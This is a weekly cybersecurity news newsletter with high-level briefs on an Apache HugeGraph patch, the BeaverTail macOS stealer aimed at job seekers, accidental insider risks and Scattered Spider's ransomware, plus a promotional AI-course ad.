DPRK Hackers Target Job Seekers with Sneaky New Malware Variant 🕵️‍♂️

Jul 19 2024

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your weekly cybersecurity newsletter that covers more info wars than Alex Jones 👨🏻‍💻 

Update 📰

FYI, we’ve decided to change the way we bring you the latest in all things cybersecurity. 💡

Instead of clogging up your inboxes with daily doses of web wisdom, we’re going to pack a week’s worth of news and tips into one weekly newsletter which will go out every Friday. 📅

It’ll contain old favourites like Patch of the Week 🩹, along with some exciting new stuff! 🎉 You’ll still receive the odd weekend special from us too. Okay, enough yapping… Hope you enjoy our new and improved Gone Phishing newsletter! 🥂

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳

Congrats to Apache, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

HugeGraph leads to Huge Gaff 🙃

🚨 Apache HugeGraph-Server Under Attack! 💥

Hackers are exploiting a critical flaw in Apache HugeGraph-Server (CVE-2024-27348, CVSS 9.8) that allows remote code execution! 💻🚨 All versions before 1.3.0 are affected. Update to version 1.3.0 with Java11 and enable the Auth system and 'Whitelist-IP/port' for extra security! 🚀 SecureLayer7 warns of code execution risks, and Shadowserver Foundation has observed active exploitation attempts. 🕵️‍♂️💥 Don't wait – update now to stay safe! 🌐🔒

🔥 Cybersecurity Hot Topics in Briefs 🩲

🛡️ US-Led Operation Crushes Massive Botnet 🛡️

A major victory for global cybersecurity as the US Justice Department dismantled the 911 S5 botnet, believed to be the world's largest. This botnet was used for various cybercrimes, affecting over 19 million IP addresses worldwide【9​ (World Economic Forum)​

💥 Ransomware Hits Key Water Utilities 💥

Ransomware attacks targeted Veolia in the US and Southern Water in the UK, causing significant disruptions. Veolia’s backend systems and servers were affected, while Southern Water faces a threat of data exposure unless a ransom is paid【1​ (World Economic Forum)​

⚠️ Massive AT&T Data Breach ⚠️

A significant data breach at AT&T has exposed sensitive customer information. This breach is part of a broader trend of increasing cyber threats affecting large enterprises and critical infrastructure【10†​ (Innovate Cybersecurity)

🏥 Cyberattack Disrupts London Hospitals 🏥

A cyberattack on a lab service provider for the NHS caused major disruptions at several London hospitals, including King's College Hospital. This incident underscores the vulnerabilities in healthcare infrastructure 

📈 AI's Role in Future Cyber Threats 📈

The UK's cybersecurity agency warns that generative AI will make phishing and social engineering attacks more convincing, posing a greater threat to all levels of cybersecurity understanding by 2025.

Now, on to today’s hottest cybersecurity news stories: 

  • 💻 MacOS users beware! N. Korean hackers have updated BeaverTail 😨

  • 🔫 Friendly fire! Are your employees naively letting the wolf in the door 🐺

  • 🕷️ Scattered Spider is back with a brand new invention: RansomHub, Qilin 👾

BeaverTail has Mac users chasing their tails 😬

🚨 DPRK Hackers Target Job Seekers with Sneaky New Malware Variant 🕵️‍♂️

Cybersecurity researchers have uncovered a new variant of stealer malware, this time posing as a legitimate macOS video call service called "MiroTalk.dmg." This crafty scheme, attributed to North Korean hackers, aims to infiltrate job seekers' devices.

🔍 What's the Deal?

The malware, dubbed BeaverTail, is part of a broader campaign known as Contagious Interview. This campaign has been targeting software developers through fake job interviews. Security researcher Patrick Wardle revealed that the malware, hidden in an Apple DMG file, can swipe sensitive data from browsers, crypto wallets, and even download more harmful payloads like the InvisibleFerret backdoor.

♟️ New Tactics

Previously spread via fake npm packages, the malware's new delivery method involves tricking victims into downloading the infected MiroTalk from a malicious site. Once executed, it steals data and instals further malware for persistent access.

🏞️ The Bigger Picture

Another related discovery involves a malicious npm package named call-blockflow, which mimics a legitimate library. Linked to the notorious Lazarus Group, this package was designed to download and execute remote binaries, masking its tracks to avoid detection. Despite being quickly removed, it managed 18 downloads.

🔒 Stay Safe!

Stay vigilant, especially if you're job hunting or downloading software. Always verify sources and watch out for unexpected downloads. The wily DPRK hackers are constantly evolving their tactics!

Learn how to build custom GPTs & automate 50% of your workflow with AI

Don’t pay for sh*tty AI courses when you can learn it for FREE!

This incredible 3-hour Masterclass on AI & ChatGPT (worth $399) makes you a master of 25+ AI tools, hacks & prompting techniques to save 16 hours/week and do more with your time.

Get it now for absolutely free! (for first 100 users only) 🎁

This masterclass will teach you how to:

  • Do AI-driven data analysis to make quick business decisions

  • Make stunning PPTs & write content for emails, socials & more in minutes

  • Build AI assistants & custom bots in minutes

  • Solve complex problems, research 10x faster & make your simpler & easier

You’ll wish you knew about this FREE AI masterclass sooner 😉

Register & save your seat now! (valid for next 24 hours only!)

It was an inside job!! 🕵️‍♂️

🚨 Beware the Accidental Insider: A Hidden Threat to Your Network Security 🛡️

Sophisticated cyber threats often find creative ways to bypass even the most robust technical defences. While some attacks involve insiders with malicious intent, a growing concern lies with the accidental insider—employees who unintentionally compromise security. Here’s how they do it and what you can do to prevent it.

🔄 Accidental Insider Triggers

  • Lack of Awareness: Many employees fall prey to phishing emails or malware due to a lack of cybersecurity knowledge.

  • Pressure to Perform: Tight deadlines can lead employees to bypass security protocols.

  • Poor Credential Handling: Weak passwords and sharing credentials make unauthorised access easier.

  • Sneakernets: Unapproved data transfers using personal devices or cloud services create vulnerabilities.

🔑 Common Exploitation Methods

  • Phishing: Tricking employees into revealing credentials.

  • Malware: Accidental downloads can grant attackers elevated privileges.

  • Lateral Movement: Using compromised credentials to access sensitive data across the network.

  • Social Engineering: Manipulating insiders to divulge information or perform actions that benefit attackers.

💥 Consequences of Accidental Insider Attacks

  • Financial Losses: Data breaches lead to fines, legal costs, and expensive remediation.

  • Reputational Damage: Public disclosure of insider incidents can erode customer trust and business relationships.

  • Operational Disruption: Attacks can cause downtime, lost productivity, and hinder revenue generation.

  • Intellectual Property Theft: Competitors or foreign entities can exploit stolen information for a market advantage.

🛡️ Proactive Measures to Mitigate Risk

  • Security Awareness Training: Regularly educate employees on cybersecurity best practices.

  • Culture of Security: Promote a security-conscious environment where suspicious activities are reported.

  • User Activity Monitoring (UAM): Keep an eye on compliance with policies, especially for privileged users.

  • Content Disarm and Reconstruction (CDR): Remove threats from files before they enter your network.

  • Cross Domain Solutions: Ensure secure, policy-driven data transfers across security domains.

  • Adopt Best Practices: Follow guidelines from Carnegie Mellon SEI CERT, MITRE, NITTF, and CISA.

By implementing these measures, organisations can significantly reduce the risk posed by accidental insiders, ensuring a stronger defence against external attacks.

Our Spidey sense is tingling 🕷️

🚨 Scattered Spider's New Ransomware Arsenal: RansomHub and Qilin 🐍

The notorious cybercrime group Scattered Spider has upped its game, adding the potent ransomware strains RansomHub and Qilin to its toolkit, Microsoft reports.

🎭 Who is Scattered Spider?

Known for their sophisticated social engineering schemes, Scattered Spider breaches targets to exploit and steal data. They have a history of targeting VMWare ESXi servers and deploying BlackCat ransomware. Also recognized as Gold Harvest, 0ktapus, Octo Tempest, and UNC3944, a key member was recently arrested in Spain.

💻 RansomHub: A Rising Threat

RansomHub, a rebranded version of the Knight ransomware, emerged this year. This ransomware-as-a-service (RaaS) payload is becoming popular among various threat actors, including those who previously used BlackCat. Microsoft notes its rapid spread and widespread use.

🔒 Expanding Threat Landscape

RansomHub is not limited to Scattered Spider. It has been used in post-compromise activities by groups like Evil Corp, following initial access via FakeUpdates infections. This development coincides with new ransomware families like FakePenny, Fog, and ShadowRoot.

🛡️ Stay Safe!

As ransomware threats evolve, Microsoft advises strict adherence to security best practices, especially credential hygiene, the principle of least privilege, and Zero Trust.

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Recent articles